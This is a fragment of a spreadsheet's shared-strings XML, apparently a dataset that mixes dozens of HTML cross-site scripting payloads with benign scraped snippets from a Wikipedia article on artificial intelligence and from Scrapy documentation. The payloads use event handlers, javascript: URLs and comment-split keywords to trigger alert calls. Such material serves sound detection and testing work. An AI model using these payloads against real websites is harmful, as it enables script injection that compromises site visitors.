    <t>&lt;script&gt; alert(asdal'') &lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;nobr onpointerenter=alert(1)&gt;XSS&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;audio onmouseleave="alert(1)"&gt;test&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;figure id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, pp.&amp;#160;129–130 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;time onpointermove=alert(1)&gt;XSS&lt;/time&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Optimism_of_early_AI-9"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-Optimism_of_early_AI_9-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Optimism_of_early_AI_9-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;frameset draggable="true" ondragleave="alert(1)"&gt;test&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;img onmousedown="alert(1)"&gt;test&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;link onmouseleave="alert(1)"&gt;test&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Scientism" title="Scientism"&gt;Scientism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;shadow style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Conventionalism" title="Conventionalism"&gt;Conventionalism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;tr draggable="true" ondragenter="alert(1)"&gt;test&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;td onpointerup=alert(1)&gt;XSS&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Category:Philosophers_of_mind" title="Category:Philosophers of mind"&gt;Philosophers category &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;canvas style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;fieldset style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;label id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/label&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;i id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/i&gt;</t>
  </si>
  <si>
    <t>READTHEDOCS_DATA['source_suffix'] = ".rst"</t>
  </si>
  <si>
    <t>&lt;section draggable="true" ondragenter="alert(1)"&gt;test&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;174–177, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;input oninput=alert(1) value=xss&gt;</t>
  </si>
  <si>
    <t>&lt;svg draggable="true" ondragend="alert(1)"&gt;test&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;object id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;492–523, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;meter id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/meter&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;keygen onpointermove=alert(1)&gt;XSS&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Circumscription_(logic)" title="Circumscription (logic)"&gt;Circumscription &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;tfoot id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;blink oncut="alert(1)" contenteditable&gt;test&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;samp onpointerdown=alert(1)&gt;XSS&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;slot oncopy="alert(1)" contenteditable&gt;test&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;mark oncontextmenu="alert(1)"&gt;test&lt;/mark&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;Games provide a well-publicized benchmark for assessing rates of progress. &lt;a href="/wiki/AlphaGo" title="AlphaGo"&gt;AlphaGo &lt;/a&gt; around 2016 brought the era of classical board-game benchmarks to a close. Games of imperfect knowledge provide new challenges to AI in the area of &lt;a href="/wiki/Game_theory" title="Game theory"&gt;game theory &lt;/a&gt;.&lt;sup id="cite_ref-280" class="reference"&gt;&lt;a href="#cite_note-280"&gt;&amp;#91;269&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-281" class="reference"&gt;&lt;a href="#cite_note-281"&gt;&amp;#91;270&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;a href="/wiki/Esports" title="Esports"&gt;E-sports &lt;/a&gt; such as &lt;a href="/wiki/StarCraft" title="StarCraft"&gt;StarCraft &lt;/a&gt; continue to provide additional public benchmarks.&lt;sup id="cite_ref-282" class="reference"&gt;&lt;a href="#cite_note-282"&gt;&amp;#91;271&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-283" class="reference"&gt;&lt;a href="#cite_note-283"&gt;&amp;#91;272&amp;#93; &lt;/a&gt; &lt;/sup&gt; There are many competitions and prizes, such as the &lt;a href="/wiki/ImageNet" title="ImageNet"&gt;Imagenet Challenge &lt;/a&gt;, to promote research in artificial intelligence. The most common areas of competition include general machine intelligence, conversational behavior, data-mining, &lt;a href="/wiki/Autonomous_car" class="mw-redirect" title="Autonomous car"&gt;robotic cars &lt;/a&gt;, and robot soccer as well as conventional games.&lt;sup id="cite_ref-284" class="reference"&gt;&lt;a href="#cite_note-284"&gt;&amp;#91;273&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Bayesian_inference" title="Bayesian inference"&gt;Bayesian inference &lt;/a&gt; algorithm:</t>
  </si>
  <si>
    <t>&lt;code id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/code&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Francis_Bacon" title="Francis Bacon"&gt;Francis Bacon &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;strike ondrop=alert(1) contenteditable&gt;drop here&lt;/strike&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFDreyfusDreyfus1986" class="citation book"&gt;&lt;a href="/wiki/Hubert_Dreyfus" title="Hubert Dreyfus"&gt;Dreyfus, Hubert &lt;/a&gt;; Dreyfus, Stuart (1986). &lt;a rel="nofollow" class="external text" href="https://archive.org/details/mindovermachinep00drey"&gt;&lt;i&gt;Mind over Machine: The Power of Human Intuition and Expertise in the Era of the Computer &lt;/i&gt; &lt;/a&gt;. Oxford, UK: Blackwell. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-02-908060-3" title="Special:BookSources/978-0-02-908060-3"&gt;&lt;bdi&gt;978-0-02-908060-3 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Mind+over+Machine%3A+The+Power+of+Human+Intuition+and+Expertise+in+the+Era+of+the+Computer&amp;amp;rft.place=Oxford%2C+UK&amp;amp;rft.pub=Blackwell&amp;amp;rft.date=1986&amp;amp;rft.isbn=978-0-02-908060-3&amp;amp;rft.aulast=Dreyfus&amp;amp;rft.aufirst=Hubert&amp;amp;rft.au=Dreyfus%2C+Stuart&amp;amp;rft_id=https%3A%2F%2Farchive.org%2Fdetails%2Fmindovermachinep00drey&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;del onkeypress="alert(1)" contenteditable&gt;test&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Inquiry" title="Inquiry"&gt;Inquiry &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFDreyfus1972" class="citation book"&gt;&lt;a href="/wiki/Hubert_Dreyfus" title="Hubert Dreyfus"&gt;Dreyfus, Hubert &lt;/a&gt; (1972). &lt;a href="/wiki/What_Computers_Can%27t_Do" class="mw-redirect" title="What Computers Can&amp;#39;t Do"&gt;&lt;i&gt;What Computers Can't Do &lt;/i&gt; &lt;/a&gt;. New York: MIT Press. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-06-011082-6" title="Special:BookSources/978-0-06-011082-6"&gt;&lt;bdi&gt;978-0-06-011082-6 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=What+Computers+Can%27t+Do&amp;amp;rft.place=New+York&amp;amp;rft.pub=MIT+Press&amp;amp;rft.date=1972&amp;amp;rft.isbn=978-0-06-011082-6&amp;amp;rft.aulast=Dreyfus&amp;amp;rft.aufirst=Hubert&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>to crawl websites and extract structured data from their pages. It can be used</t>
  </si>
  <si>
    <t>&lt;blink onclick="alert(1)"&gt;test&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;small style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;span onpointerout=alert(1)&gt;XSS&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;shadow onmouseleave="alert(1)"&gt;test&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Fitness_function" title="Fitness function"&gt;Fitness function &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;figure onmouseover="alert(1)"&gt;test&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;figure id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;tt onbeforecut="alert(1)" contenteditable&gt;test&lt;/tt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Learn how to use contracts for testing your spiders.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;nobr id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/nobr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-6"&gt;&lt;a href="#Knowledge_representation"&gt;&lt;span class="tocnumber"&gt;4.2 </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;code ondrop=alert(1) contenteditable&gt;drop here&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup onpointerdown=alert(1)&gt;XSS&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote onkeydown="alert(1)" contenteditable&gt;test&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;samp draggable="true" ondragend="alert(1)"&gt;test&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset onbeforepaste="alert(1)" contenteditable&gt;test&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Robot_kit" title="Robot kit"&gt;Kits &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;time onpaste="alert(1)" contenteditable&gt;test&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;legend ondblclick="alert(1)"&gt;test&lt;/legend&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="plainlinks hlist navbar mini"&gt;&lt;ul&gt;&lt;li class="nv-view"&gt;&lt;a href="/wiki/Template:Artificial_intelligence" title="Template:Artificial intelligence"&gt;&lt;abbr title="View this template"&gt;v &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt;&lt;li class="nv-talk"&gt;&lt;a href="/wiki/Template_talk:Artificial_intelligence" title="Template talk:Artificial intelligence"&gt;&lt;abbr title="Discuss this template"&gt;t &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt;&lt;li class="nv-edit"&gt;&lt;a class="external text" href="https://en.wikipedia.org/w/index.php?title=Template:Artificial_intelligence&amp;amp;action=edit"&gt;&lt;abbr title="Edit this template"&gt;e &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt; &lt;/tbody&gt; &lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;command draggable="true" ondragleave="alert(1)"&gt;test&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;strike style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;caption onkeydown="alert(1)" contenteditable&gt;test&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;xmp oncopy="alert(1)" contenteditable&gt;test&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;mark onpointerleave=alert(1)&gt;XSS&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;abbr onpointerleave=alert(1)&gt;XSS&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot onpointerleave=alert(1)&gt;XSS&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;picture id=x tabindex=1 onfocus=alert(1)&gt;&lt;/picture&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=32" title="Edit section: Deep feedforward neural networks"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>javas&lt;!-- --&gt;cript:alert('')</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Bayesian_inference-206"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Bayesian_inference_206-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;col id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;shadow onload=alert(1)&gt;&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Unlike Simon and Newell, &lt;a href="/wiki/John_McCarthy_(computer_scientist)" title="John McCarthy (computer scientist)"&gt;John McCarthy &lt;/a&gt; felt that machines did not need to simulate human thought, but should instead try to find the essence of abstract reasoning and problem-solving, regardless whether people used the same algorithms.&lt;sup id="cite_ref-Biological_intelligence_vs._intelligence_in_general_16-2" class="reference"&gt;&lt;a href="#cite_note-Biological_intelligence_vs._intelligence_in_general-16"&gt;&amp;#91;16&amp;#93; &lt;/a&gt; &lt;/sup&gt; His laboratory at &lt;a href="/wiki/Stanford_University" title="Stanford University"&gt;Stanford &lt;/a&gt; (&lt;a href="/wiki/Stanford_Artificial_Intelligence_Laboratory" class="mw-redirect" title="Stanford Artificial Intelligence Laboratory"&gt;SAIL &lt;/a&gt;) focused on using formal &lt;a href="/wiki/Logic" title="Logic"&gt;logic &lt;/a&gt; to solve a wide variety of problems, including &lt;a href="/wiki/Knowledge_representation" class="mw-redirect" title="Knowledge representation"&gt;knowledge representation &lt;/a&gt;, &lt;a href="/wiki/Automated_planning_and_scheduling" title="Automated planning and scheduling"&gt;planning &lt;/a&gt; and &lt;a href="/wiki/Machine_learning" title="Machine learning"&gt;learning &lt;/a&gt;.&lt;sup id="cite_ref-AI_at_Stanford_in_the_60s_161-0" class="reference"&gt;&lt;a href="#cite_note-AI_at_Stanford_in_the_60s-161"&gt;&amp;#91;158&amp;#93; &lt;/a&gt; &lt;/sup&gt; Logic was also the focus of the work at the &lt;a href="/wiki/University_of_Edinburgh" title="University of Edinburgh"&gt;University of Edinburgh &lt;/a&gt; and elsewhere in Europe which led to the development of the programming language &lt;a href="/wiki/Prolog" title="Prolog"&gt;Prolog &lt;/a&gt; and the science of &lt;a href="/wiki/Logic_programming" title="Logic programming"&gt;logic programming &lt;/a&gt;.&lt;sup id="cite_ref-AI_at_Edinburgh_and_France_in_the_60s_162-0" class="reference"&gt;&lt;a href="#cite_note-AI_at_Edinburgh_and_France_in_the_60s-162"&gt;&amp;#91;159&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;samp onmouseenter="alert(1)"&gt;test&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/History_of_robots" title="History of robots"&gt;History &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/stats.html"&gt;Stats Collection&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;img oncut="alert(1)" contenteditable&gt;test&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;b ondblclick="alert(1)"&gt;test&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;button style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;p class="caption"&gt;&lt;span class="caption-text"&gt;Basic concepts</t>
  </si>
  <si>
    <t>&lt;optgroup onkeyup="alert(1)" contenteditable&gt;test&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;Numerous researchers now use variants of a deep learning recurrent NN called the &lt;a href="/wiki/Long_short-term_memory" title="Long short-term memory"&gt;long short-term memory &lt;/a&gt; (LSTM) network published by Hochreiter &amp;amp; Schmidhuber in 1997.&lt;sup id="cite_ref-lstm_266-0" class="reference"&gt;&lt;a href="#cite_note-lstm-266"&gt;&amp;#91;255&amp;#93; &lt;/a&gt; &lt;/sup&gt; LSTM is often trained by &lt;a href="/wiki/Connectionist_temporal_classification" title="Connectionist temporal classification"&gt;Connectionist Temporal Classification &lt;/a&gt; (CTC).&lt;sup id="cite_ref-graves2006_267-0" class="reference"&gt;&lt;a href="#cite_note-graves2006-267"&gt;&amp;#91;256&amp;#93; &lt;/a&gt; &lt;/sup&gt; At Google, Microsoft and Baidu this approach has revolutionized &lt;a href="/wiki/Speech_recognition" title="Speech recognition"&gt;speech recognition &lt;/a&gt;.&lt;sup id="cite_ref-hannun2014_268-0" class="reference"&gt;&lt;a href="#cite_note-hannun2014-268"&gt;&amp;#91;257&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-sak2014_269-0" class="reference"&gt;&lt;a href="#cite_note-sak2014-269"&gt;&amp;#91;258&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-liwu2015_270-0" class="reference"&gt;&lt;a href="#cite_note-liwu2015-270"&gt;&amp;#91;259&amp;#93; &lt;/a&gt; &lt;/sup&gt; For example, in 2015, Google's speech recognition experienced a dramatic performance jump of 49% through CTC-trained LSTM, which is now available through &lt;a href="/wiki/Google_Voice" title="Google Voice"&gt;Google Voice &lt;/a&gt; to billions of smartphone users.&lt;sup id="cite_ref-sak2015_271-0" class="reference"&gt;&lt;a href="#cite_note-sak2015-271"&gt;&amp;#91;260&amp;#93; &lt;/a&gt; &lt;/sup&gt; Google also used LSTM to improve machine translation,&lt;sup id="cite_ref-sutskever2014_272-0" class="reference"&gt;&lt;a href="#cite_note-sutskever2014-272"&gt;&amp;#91;261&amp;#93; &lt;/a&gt; &lt;/sup&gt; Language Modeling&lt;sup id="cite_ref-vinyals2016_273-0" class="reference"&gt;&lt;a href="#cite_note-vinyals2016-273"&gt;&amp;#91;262&amp;#93; &lt;/a&gt; &lt;/sup&gt; and Multilingual Language Processing.&lt;sup id="cite_ref-gillick2015_274-0" class="reference"&gt;&lt;a href="#cite_note-gillick2015-274"&gt;&amp;#91;263&amp;#93; &lt;/a&gt; &lt;/sup&gt; LSTM combined with CNNs also improved automatic image captioning&lt;sup id="cite_ref-vinyals2015_275-0" class="reference"&gt;&lt;a href="#cite_note-vinyals2015-275"&gt;&amp;#91;264&amp;#93; &lt;/a&gt; &lt;/sup&gt; and a plethora of other applications.</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;h1 ondrop=alert(1) contenteditable&gt;drop here&lt;/h1&gt;</t>
  </si>
  <si>
    <t>HREF="javascript:alert('')</t>
  </si>
  <si>
    <t>&lt;noframes oncontextmenu="alert(1)"&gt;test&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;ol id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;address onclick="alert(1)"&gt;test&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;video src/onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;hgroup style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;shadow onmouseover="alert(1)"&gt;test&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;dl oncut="alert(1)" contenteditable&gt;test&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;frame style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;tt onkeydown="alert(1)" contenteditable&gt;test&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;span oncut="alert(1)" contenteditable&gt;test&lt;/span&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Evaluating progress </t>
  </si>
  <si>
    <t>&lt;param oncut="alert(1)" contenteditable&gt;test&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;h1 onpointerover=alert(1)&gt;XSS&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;basefont id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/basefont&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;textarea style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;plaintext style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;bdi onmouseout="alert(1)"&gt;test&lt;/bdi&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-AI_at_CMU_in_the_60s-159"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-AI_at_CMU_in_the_60s_159-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;element onmouseover="alert(1)"&gt;test&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;The ch as reasoning and logic. The functional model refers to the correlating data to its computed counterpart.&lt;sup id="cite_ref-87" class="reference"&gt;&lt;a href="#cite_note-87"&gt;&amp;#91;84&amp;#93; &lt;/a&gt; &lt;/sup&gt; consist of particular traits or capabilities that researchers expect an intelligent system to display. The traits described below have received the most attention.&lt;sup id="cite_ref-Problems_of_AI_15-2" class="reference"&gt;&lt;a href="#cite_note-Problems_of_AI-15"&gt;&amp;#91;15&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Network_service" title="Network service"&gt;Network service &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Image_compression" title="Image compression"&gt;Image compression &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;div id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;q onpointerout=alert(1)&gt;XSS&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Psychophysical_parallelism" title="Psychophysical parallelism"&gt;Parallelism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup onpointerenter=alert(1)&gt;XSS&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_computer_science" title="Glossary of computer science"&gt;Computer science &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;bdi oncopy="alert(1)" contenteditable&gt;test&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;listing id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;meta id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/meta&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;param onbeforepaste="alert(1)" contenteditable&gt;test&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;Video&gt; &lt;source onerror = "javascript: alert ()"&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Consilience" title="Consilience"&gt;Consilience &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Citizen_science#Plastics_and_pollution" title="Citizen science"&gt;Citizen Science &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;frameset id=x tabindex=1 onfocus=alert(1)&gt;&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Hidden_Markov_model" title="Hidden Markov model"&gt;Hidden Markov model &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;isindex type=image src=1 onerror=alert()&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=# onmouseover="alert('xxs')"&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/spiders.html"&gt;Spiders&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
